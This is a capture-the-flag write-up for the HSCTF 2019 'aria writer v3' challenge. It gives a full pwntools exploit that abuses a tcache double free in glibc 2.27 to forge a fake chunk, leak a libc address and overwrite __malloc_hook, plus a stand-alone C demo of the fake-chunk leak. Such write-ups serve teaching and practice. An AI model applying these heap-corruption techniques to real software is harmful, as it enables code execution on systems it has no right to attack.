SDJ (not 수돈재, heh)


HSCTF 2019 - aria writer v3

ShinDongJun 2019. 10. 8. 19:25

64-bit binary with Full RELRO, stack canary and NX enabled. Full RELRO rules out a GOT overwrite, which is why the script below goes after __malloc_hook instead.

The provided libc is 2.27 and this is a tcache challenge, so I solved it on Ubuntu 18.04.

 

from pwn import *
 
p = process('./aria-writer-v3')
 
def choice(idx):
    p.sendlineafter("> ", str(idx))
 
def alloc(size, content):
    choice(1)
    p.sendlineafter("> ", str(size))
    p.sendafter("> ", content)
 
def free():
    choice(2)
 
win  = 0x00000000004008A7   # win() inside the binary
name = 0x0000000000602040   # name buffer in .bss
aim  = 0x602038             # name - 8: where the size field of the fake chunk will go
 
# one_gadget offsets for Ubuntu 18.04 libc-2.27.so (computed below but not used; win() is simpler)
one = [0x4f2c5, 0x4f322, 0x10a38c]
 
# name input: 8 bytes of filler, then a large value into the 4-byte field 176 bytes past name
# (the write-up does not say what that field is)
pay = 'a'*8 + '\x00'*(4*42) + p32(0xf0000000)
p.sendlineafter("> ", pay)
 
# tcache double free (libc 2.27 has no double-free check) in the 0x90 bin
alloc(0x80, 'a'*0x10)
free()
free()
 
alloc(0x80, p64(aim+0x500))   # 1st malloc hands the chunk back: overwrite its fd (tcache next)
alloc(0x80, 'a'*0x10)         # 2nd malloc hands the same chunk back
# 3rd malloc returns aim+0x500: write the size fields of the two chunks that follow the fake
# 0x510 chunk so free() accepts it (sane next size with PREV_INUSE set, no forward consolidation)
alloc(0x80, p64(0)*2+p64(0x21)+p64(0)*3+p64(0x21))
 
# same trick in the 0xa0 bin, this time landing on aim
alloc(0x90, 'b'*0x10)
free()
free()
 
alloc(0x90, p64(aim))
alloc(0x90, 'b'*0x10)
# size 0x511 at aim (= name-8) turns name into the user pointer of a fake 0x510 chunk;
# the value aim+8 (= name) stored right after it is what the next free() releases
alloc(0x90, p64(0x511)+p64(aim+0x8))
 
# freeing the fake chunk: too big for tcache, so it goes to the unsorted bin and its
# fd/bk (&main_arena+96) get written into name, which the program prints back
free()    # leak
 
p.recvuntil('\n')
main_arena_96 = u64(p.recv(6).ljust(8,'\x00'))
malloc_hook = main_arena_96 - 96 - 0x10   # __malloc_hook sits 0x10 before main_arena
libc_base = malloc_hook - 4111408         # __malloc_hook = libc_base + 0x3ebc30 on 18.04 libc 2.27
one_gadget = libc_base + one[1]
 
print "main_arena_96 : " + hex(main_arena_96)
print "malloc_hook : " + hex(malloc_hook)
print "libc_base : " + hex(libc_base)
print "one_gadget : " + hex(one_gadget)
 
# third double free, 0x50 bin, landing on __malloc_hook
alloc(0x40, '\x00'*8)
alloc(0x40, '\x00'*8)
free()
free()
 
alloc(0x40, p64(malloc_hook))
alloc(0x40, 'c'*0x10)
alloc(0x40, p64(win)*2)   # __malloc_hook = win (second copy also covers the 8 bytes after it)
 
# any malloc now calls win()
choice(1)
p.sendlineafter("> ", str(1))
 
p.interactive()
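The "free()    # leak" step relies on glibc accepting a hand-made 0x510 chunk and linking it into the unsorted bin, which the script does not explain. The following is an added, stand-alone C example (not code from the write-up or the challenge binary) that builds the same fake chunk in a global buffer, frees it, and reads back the libc pointer glibc writes into it. It assumes x86-64 glibc (2.27 or later: 0x510 is outside tcache range and the checks on the neighbouring headers are the same) with the program's data below the heap; `region`, `FAKE_SIZE` and `fake_chunk_leak` are names chosen here.

```c
/* Added example, not the write-up's code: fake-chunk unsorted-bin leak, stand-alone.
 * Assumes x86-64 glibc >= 2.27 and a non-mmapped global region below the heap. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FAKE_SIZE 0x510UL  /* above tcache's largest chunk (0x410), so free() uses the bins */

/* Writable global standing in for the .bss area the exploit uses (name-8 and aim+0x500).
 * 16-byte alignment matters: free() rejects a misaligned chunk pointer outright. */
static uint64_t region[0x600 / 8] __attribute__((aligned(16)));

/* Lays out a fake 0x510 chunk plus the two headers free() inspects after it, frees it,
 * and returns the bk pointer glibc stored in the chunk: the unsorted bin head inside
 * main_arena (main_arena+96 on 18.04's libc-2.27). Returns 0 if a sanity check fails. */
uintptr_t fake_chunk_leak(void)
{
    if (malloc(0x18) == NULL)           /* make sure the arena exists; intentionally leaked */
        return 0;

    memset(region, 0, sizeof region);
    uint64_t *chunk = region + 2;       /* header at +0x10: [prev_size, size] */
    uint64_t *user  = chunk + 2;        /* the pointer that gets passed to free() */
    chunk[1] = FAKE_SIZE | 1;           /* size | PREV_INUSE: nothing to merge backwards */

    /* Same layout as the exploit's p64(0)*2+p64(0x21)+p64(0)*3+p64(0x21): the next
     * chunk needs a sane size with PREV_INUSE set, and the chunk after that must look
     * in use so free() does not try to merge forwards into it. */
    uint64_t *next  = (uint64_t *)((char *)chunk + FAKE_SIZE);
    uint64_t *next2 = (uint64_t *)((char *)next + 0x20);
    next[1]  = 0x21;
    next2[1] = 0x21;

    free(user);                         /* goes to the unsorted bin; fd/bk now point into libc */

    uintptr_t bk = (uintptr_t)chunk[3]; /* chunk[2] = fd, chunk[3] = bk */
    /* Cross-check: the bin head's own fd (0x10 past the bk value) points at our chunk. */
    if (bk == 0 || *(uint64_t *)(bk + 0x10) != (uint64_t)(uintptr_t)chunk)
        return 0;

    /* Reclaim the fake chunk (exact fit from the unsorted bin) so the arena is left clean. */
    if (malloc(FAKE_SIZE - 8) != user)
        return 0;
    return bk;
}

int main(void)
{
    uintptr_t leak = fake_chunk_leak();
    if (!leak) {
        puts("fake chunk was not accepted by free()");
        return 1;
    }
    printf("unsorted bin head: %#lx\n", (unsigned long)leak);
    printf("on 18.04 libc-2.27 that puts __malloc_hook at %#lx\n",
           (unsigned long)(leak - 96 - 0x10));
    return 0;
}
```

Compile with `gcc -o fakechunk fakechunk.c` and run; the printed value lands inside libc's data segment, which is all the exploit needs to compute libc_base. The reclaim at the end is there so nothing the process allocates afterwards carves from the fake chunk; in the real exploit that does not matter, but a stand-alone demo should not leave the allocator in a corrupted state.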
 

 
